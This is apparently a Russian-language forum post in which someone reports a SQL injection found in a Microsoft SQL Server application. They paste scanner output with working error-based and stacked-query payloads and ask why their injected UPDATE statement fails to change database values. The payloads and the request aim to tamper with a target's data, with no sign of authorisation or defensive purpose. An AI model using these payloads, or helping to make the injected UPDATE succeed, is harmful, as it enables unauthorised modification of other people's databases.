SQLi был обнаружен при обнаружении уязвимости.Поэтому я использовал запрос UPDATE, чтобы изменить значение базы данных, но он не работает.
Я попытался проверить, что в базе данных есть триггер, но триггера не существует.
UPDATEDATABASE.DBO.TABLE SET ID = 'AFTER' WHERE ID = 'BEFORE' - НЕ РАБОТАЕТ.
---
Parameter: #1* ((custom) POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
Payload:page=' AND 2889 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(113)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (2889=2889) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(107)+CHAR(98)+CHAR(113)))-- LRXC
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload:page=';WAITFOR DELAY '0:0:5'--
---
Может кто-нибудь сказать мне, как?